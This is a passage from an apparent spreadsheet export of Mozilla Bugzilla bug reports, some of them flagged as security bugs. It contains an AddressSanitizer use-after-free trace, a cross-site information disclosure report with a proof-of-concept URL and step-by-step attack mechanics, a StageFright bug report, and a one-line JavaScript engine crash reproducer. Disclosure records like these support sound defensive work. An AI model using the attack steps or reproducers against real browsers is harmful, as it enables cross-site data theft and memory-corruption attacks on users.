    #22 0x7fa66aca5b5d in js::DirectEvalStringFromIon(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JSString*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:426:10
    #23 0x207208d326ac  (&lt;unknown module&gt;)
0x61d0015973ab is located 1323 bytes inside of 2048-byte region [0x61d001596e80,0x61d001597680)
freed by thread T0 (Web Content) here:
    #0 0x55b307c17f4d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7fa65d3f5486 in Free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:198:34
    #2 0x7fa65d3f5486 in nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::ShrinkCapacity(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:229:5
    #3 0x7fa6647fdc19 in Clear /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTObserverArray.h:248:12
    #4 0x7fa6647fdc19 in RemoveAllListenersSilently /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:148:14
    #5 0x7fa6647fdc19 in mozilla::EventListenerManager::Disconnect() /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1316:3
    #6 0x7fa661506c50 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1103:23
    #7 0x7fa66156aab3 in nsGlobalWindowOuter::SetNewDocument(mozilla::dom::Document*, nsISupports*, bool, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:2231:19
    #8 0x7fa667110a6a in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::dom::WindowGlobalChild*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:983:22
    #9 0x7fa66710fe1a in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:743:10
    #10 0x7fa669d1e700 in nsDocShell::SetupNewViewer(nsIContentViewer*, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8379:7
    #11 0x7fa669d1d609 in nsDocShell::Embed(nsIContentViewer*, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6154:17
    #12 0x7fa669d28cab in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*, nsIURI*, bool, bool, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6991:14
    #13 0x7fa669cd39ba in nsDocShell::EnsureContentViewer() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6826:17
    #14 0x7fa669d00e07 in GetDocument /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:3624:3
    #15 0x7fa669d00e07 in non-virtual thunk to nsDocShell::GetDocument() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #16 0x7fa66158e471 in nsGlobalWindowOuter::NotifyContentBlockingEvent(unsigned int, nsIChannel*, bool, nsIURI*, nsIChannel*, mozilla::Maybe&lt;mozilla::AntiTrackingCommon::StorageAccessGrantedReason&gt; const&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:5404:38
    #17 0x7fa66a3418c1 in (anonymous namespace)::NotifyBlockingDecisionInternal(nsIChannel*, nsIChannel*, mozilla::AntiTrackingCommon::BlockingDecision, unsigned int, nsIURI*, nsPIDOMWindowOuter*) /builds/worker/workspace/build/src/toolkit/components/antitracking/AntiTrackingCommon.cpp:892:12
    #18 0x7fa66a32d81a in mozilla::AntiTrackingCommon::NotifyBlockingDecision(nsPIDOMWindowInner*, mozilla::AntiTrackingCommon::BlockingDecision, unsigned int) /builds/worker/workspace/build/src/toolkit/components/antitracking/AntiTrackingCommon.cpp:2126:3
    #19 0x7fa66a345c35 in mozilla::StorageDisabledByAntiTracking(nsPIDOMWindowInner*, nsIChannel*, nsIPrincipal*, nsIURI*, unsigned int&amp;) /builds/worker/workspace/build/src/toolkit/components/antitracking/StorageAccess.cpp:300:5
    #20 0x7fa66a344886 in InternalStorageAllowedCheck(nsIPrincipal*, nsPIDOMWindowInner*, nsIURI*, nsIChannel*, nsICookieSettings*, unsigned int&amp;) /builds/worker/workspace/build/src/toolkit/components/antitracking/StorageAccess.cpp:141:8
    #21 0x7fa66a34439f in mozilla::StorageAllowedForWindow(nsPIDOMWindowInner*, unsigned int*) /builds/worker/workspace/build/src/toolkit/components/antitracking/StorageAccess.cpp:207:12
    #22 0x7fa66153685e in nsGlobalWindowInner::GetLocalStorage(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:4544:26
    #23 0x7fa661546fcc in nsGlobalWindowInner::EventListenerAdded(nsAtom*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:6100:5
    #24 0x7fa6648048a5 in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:743:16
    #25 0x7fa66480fc57 in mozilla::EventListenerManager::SetEventHandler(nsAtom*, mozilla::dom::EventHandlerNonNull*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1530:3
    #26 0x7fa66355e7dc in SetOnstorage /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventNameList.h:315:1
    #27 0x7fa66355e7dc in mozilla::dom::Window_Binding::set_onstorage(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:17747:24
    #28 0x7fa66407413d in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3146:8
    #29 0x7fa66abbef99 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458:13
    #30 0x7fa66abbef99 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:550:12
    #31 0x7fa66abc5161 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:619:10
    #32 0x7fa66abc5161 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:636:8
    #33 0x7fa66abc5161 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:774:10
    #34 0x7fa66b2ec273 in SetExistingProperty(JSContext*, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2943:8
    #35 0x7fa66b2e50cd in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2972:14
    #36 0x7fa66aef5597 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:283:10
    #37 0x7fa66aef5597 in js::ForwardingProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:149:10
    #38 0x7fa661560100 in nsOuterWindowProxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:944:23
previously allocated by thread T0 (Web Content) here:
    #0 0x55b307c184e9 in realloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:164:3
    #1 0x55b307c4d75d in moz_xrealloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:72:18
    #2 0x7fa65d3f4329 in Realloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:205:12
    #3 0x7fa65d3f4329 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:191:35
    #4 0x7fa6647fe1e2 in ExtendCapacity&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:117:16
    #5 0x7fa6647fe1e2 in AppendElements&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1694:49
    #6 0x7fa6647fe1e2 in AppendElement&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1719:12
    #7 0x7fa6647fe1e2 in AppendElement /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTObserverArray.h:192:46
    #8 0x7fa6647fe1e2 in mozilla::EventListenerManager::AddEventListenerInternal(mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt;, mozilla::EventMessage, nsAtom*, mozilla::EventListenerFlags const&amp;, bool, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:237:63
    #9 0x7fa6648043ca in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:729:5
    #10 0x7fa66480fc57 in mozilla::EventListenerManager::SetEventHandler(nsAtom*, mozilla::dom::EventHandlerNonNull*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1530:3
    #11 0x7fa6635529fc in SetOnafterprint /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventNameList.h:276:1
    #12 0x7fa6635529fc in mozilla::dom::Window_Binding::set_onafterprint(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:16694:24
    #13 0x7fa66407413d in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3146:8
    #14 0x7fa66abbef99 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458:13
    #15 0x7fa66abbef99 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:550:12
    #16 0x7fa66abc5161 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:619:10
    #17 0x7fa66abc5161 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:636:8
    #18 0x7fa66abc5161 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:774:10
    #19 0x7fa66b2ec273 in SetExistingProperty(JSContext*, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2943:8
    #20 0x7fa66b2e50cd in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2972:14
    #21 0x7fa66aef5597 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:283:10
    #22 0x7fa66aef5597 in js::ForwardingProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:149:10
    #23 0x7fa661560100 in nsOuterWindowProxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:944:23
    #24 0x7fa66aed3725 in setInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:395:19
    #25 0x7fa66aed3725 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:403:10
    #26 0x7fa66ab9db69 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:280:12
    #27 0x7fa66ab9db69 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:270:10
    #28 0x7fa66ab9db69 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2875:12
    #29 0x7fa66ab8997a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #30 0x7fa66abc598f in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:812:13
    #31 0x7fa66aca5b5d in js::DirectEvalStringFromIon(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JSString*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:426:10
    #32 0x207208d326ac  (&lt;unknown module&gt;)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:751:30 in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool)
Shadow bytes around the buggy address:
  0x0c3a802aae20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aae30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aae40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aae50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aae60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c3a802aae70: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aae80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aae90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aaea0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aaeb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a802aaec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7681==ABORTING
```</t>
        </is>
      </c>
      <c r="X1707" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1708">
      <c r="A1708" t="n">
        <v>1149605</v>
      </c>
      <c r="B1708" t="inlineStr">
        <is>
          <t>2015-03-31 09:26:09 -0700</t>
        </is>
      </c>
      <c r="C1708" t="inlineStr">
        <is>
          <t>Security Vulnerability in StageFright MP4 Processing</t>
        </is>
      </c>
      <c r="D1708" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:53 -0700</t>
        </is>
      </c>
      <c r="E1708" t="n">
        <v>1</v>
      </c>
      <c r="F1708" t="n">
        <v>1</v>
      </c>
      <c r="G1708" t="n">
        <v>3</v>
      </c>
      <c r="H1708" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1708" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1708" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1708" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1708" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1708" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N1708" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1708" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1708" t="inlineStr">
        <is>
          <t>[Android and B2G] Embargo until July 8, 2015 (needs a fix in Firefox 39) [adv-main38-]</t>
        </is>
      </c>
      <c r="Q1708" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1708" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1708" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T1708" t="n">
        <v>1</v>
      </c>
      <c r="U1708" t="n">
        <v>0</v>
      </c>
      <c r="V1708" t="n">
        <v>67</v>
      </c>
      <c r="W1708" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Firefox for Android
Steps to reproduce:
Audited source and discovered an issue in the StageFright code shipping with Firefox. Developed proof-of-concept code.
I apologize for the brief details here, I will attach proof-of-concept code and an advisory with much more detail soon.
Actual results:
Crashed with the potential for arbitrary code execution
Expected results:
Failed to render.</t>
        </is>
      </c>
      <c r="X1708" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1709">
      <c r="A1709" t="n">
        <v>576616</v>
      </c>
      <c r="B1709" t="inlineStr">
        <is>
          <t>2010-07-02 13:08:13 -0700</t>
        </is>
      </c>
      <c r="C1709" t="inlineStr">
        <is>
          <t>cross-site information disclosure via modal calls</t>
        </is>
      </c>
      <c r="D1709" t="inlineStr">
        <is>
          <t>2015-10-16 11:47:35 -0700</t>
        </is>
      </c>
      <c r="E1709" t="n">
        <v>1</v>
      </c>
      <c r="F1709" t="n">
        <v>1</v>
      </c>
      <c r="G1709" t="n">
        <v>3</v>
      </c>
      <c r="H1709" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1709" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1709" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1709" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1709" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1709" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1709" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1709" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1709" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q1709" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1709" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1709" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1709" t="n">
        <v>1</v>
      </c>
      <c r="U1709" t="n">
        <v>0</v>
      </c>
      <c r="V1709" t="n">
        <v>22</v>
      </c>
      <c r="W1709" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4
Build Identifier: 
This site:
http://eaea.sirdarckcat.net/weirdyes.php?loc=http://google.com/#//0x.lv/xss.php?plain_xss=
Shows a vulnerability that allows an attacker to access some objects it shouldn't (eg. the location object).
1.- Setting the URL of a frame to javascript:LockExecution();InterestingObject;
2.- LockExecution can be alert() or XHR.send(), or XML.open(), etc..
3.- The attacker then sets the frame's location to the target website.
4.- When the target page finishes loading, the LockExecution function is unlocked, and a new window is created leaking a reference to InterestingObject to the page.
5.- interestingObject.toString() is called by firefox and its result is written in the hosting page.
Reproducible: Always
Steps to Reproduce:
1. Visit http://eaea.sirdarckcat.net/weirdyes.php?loc=http://google.com/#//0x.lv/xss.php?plain_xss=
2. google.com redirects to www.google.com (poc)
3. eaea.sirdarckcat.net is able to read window.location
Actual Results:  
eaea.sirdarckcat.net is able to read window.location
Expected Results:  
eaea.sirdarckcat.net shouldn't able to read window.location</t>
        </is>
      </c>
      <c r="X1709" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1710">
      <c r="A1710" t="n">
        <v>1566212</v>
      </c>
      <c r="B1710" t="inlineStr">
        <is>
          <t>2019-07-15 14:05:14 -0700</t>
        </is>
      </c>
      <c r="C1710" t="inlineStr">
        <is>
          <t>[Experiment] Pref-Flip: activity-stream-pktnewtabH12019-68-2-branch-confirmation-test-V2 Fx 68.0 Release</t>
        </is>
      </c>
      <c r="D1710" t="inlineStr">
        <is>
          <t>2019-10-02 08:20:43 -0700</t>
        </is>
      </c>
      <c r="E1710" t="n">
        <v>1</v>
      </c>
      <c r="F1710" t="n">
        <v>1</v>
      </c>
      <c r="G1710" t="n">
        <v>5</v>
      </c>
      <c r="H1710" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1710" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J1710" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K1710" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1710" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1710" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1710" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1710" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1710" t="inlineStr"/>
      <c r="Q1710" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1710" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1710" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1710" t="n">
        <v>1</v>
      </c>
      <c r="U1710" t="n">
        <v>0</v>
      </c>
      <c r="V1710" t="n">
        <v>2</v>
      </c>
      <c r="W1710" t="inlineStr">
        <is>
          <t>activity-stream-pktnewtabH12019-68-2-branch-confirmation-test-V2
Pocket New Tab 2 branch confirmation study to get high resolution tests on overall browser metrics, measure impact of New Tab layouts on search (1 candidate + 1 control) for release in Firefox 69.
NOTE: this is a re-release of this experiment: 
 - https://experimenter.services.mozilla.com/experiments/sutawandaplaceholder/
with the following specs changed: 
* control/default pref value changed to reflect new value in FF68
* treatment pref value updated to include new parameters in FF68
* version targeting updated to only include FF68 and FF69 due to the default pref value change
* bucket sampling should also be updated to exclude previously run newtab experiments as well as other pocket experiments
* sampling rate modified to reflect smaller population due to proximity to FF68 release 
NOTE: we are filing this experimenter ticket now as a precaution targeting a 7/18 or 7/18 launch (pending timeline constraints), however, if feasible, it is preferable to launch this experiment on 7/23 to allow full uptake of FF68 into the release population (in which case we will retire this ticket and file a separate ticket).
Experimenter is the source of truth for details and delivery. Changes to Bugzilla are not reflected in Experimenter and will not change delivery configuration.
More information: https://experimenter.services.mozilla.com/experiments/activity-stream-pktnewtabh12019-68-2-branch-confirmation-test-v2/</t>
        </is>
      </c>
      <c r="X1710" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1711">
      <c r="A1711" t="n">
        <v>350238</v>
      </c>
      <c r="B1711" t="inlineStr">
        <is>
          <t>2006-08-25 15:48:28 -0700</t>
        </is>
      </c>
      <c r="C1711" t="inlineStr">
        <is>
          <t>&lt;x/&gt;.@*++ causes "Assertion failure: JS_UPTRDIFF(fp-&gt;sp, fp-&gt;spbase) &lt;= depthdiff" at jsinterp.c:392</t>
        </is>
      </c>
      <c r="D1711" t="inlineStr">
        <is>
          <t>2006-11-10 11:27:15 -0800</t>
        </is>
      </c>
      <c r="E1711" t="n">
        <v>1</v>
      </c>
      <c r="F1711" t="n">
        <v>1</v>
      </c>
      <c r="G1711" t="n">
        <v>3</v>
      </c>
      <c r="H1711" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1711" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1711" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1711" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1711" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1711" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1711" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1711" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1711" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1711" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1711" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1711" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T1711" t="n">
        <v>1</v>
      </c>
      <c r="U1711" t="n">
        <v>0</v>
      </c>
      <c r="V1711" t="n">
        <v>18</v>
      </c>
      <c r="W1711" t="inlineStr">
        <is>
          <t>Steps to reproduce:
  In a debug build,
  javascript:&lt;x/&gt;.@*++;
Result:
  Assertion failure: JS_UPTRDIFF(fp-&gt;sp, fp-&gt;spbase) &lt;= depthdiff,
  at jsinterp.c:392</t>
        </is>
      </c>
      <c r="X1711" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1712">
      <c r="A1712" t="n">
        <v>1600626</v>
      </c>
      <c r="B1712" t="inlineStr">
        <is>
          <t>2019-12-02 06:54:55 -0800</t>
        </is>
      </c>
      <c r="C1712" t="inlineStr">
        <is>
          <t>PushHealth should indicate progress of the try</t>
        </is>
      </c>
      <c r="D1712" t="inlineStr">
        <is>
          <t>2019-12-16 13:26:41 -0800</t>
        </is>
      </c>
      <c r="E1712" t="n">
        <v>1</v>
      </c>
      <c r="F1712" t="n">
        <v>1</v>
      </c>
      <c r="G1712" t="n">
        <v>7</v>
      </c>
      <c r="H1712" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1712" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1712" t="inlineStr">
        <is>
          <t>Push Health</t>
        </is>
      </c>
      <c r="K1712" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1712" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1712" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1712" t="inlineStr"/>
      <c r="Q1712" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1712" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1712" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1712" t="n">
        <v>1</v>
      </c>
      <c r="U1712" t="n">
        <v>0</v>
      </c>
      <c r="V1712" t="n">
        <v>3</v>
      </c>
      <c r="W1712" t="inlineStr">
        <is>
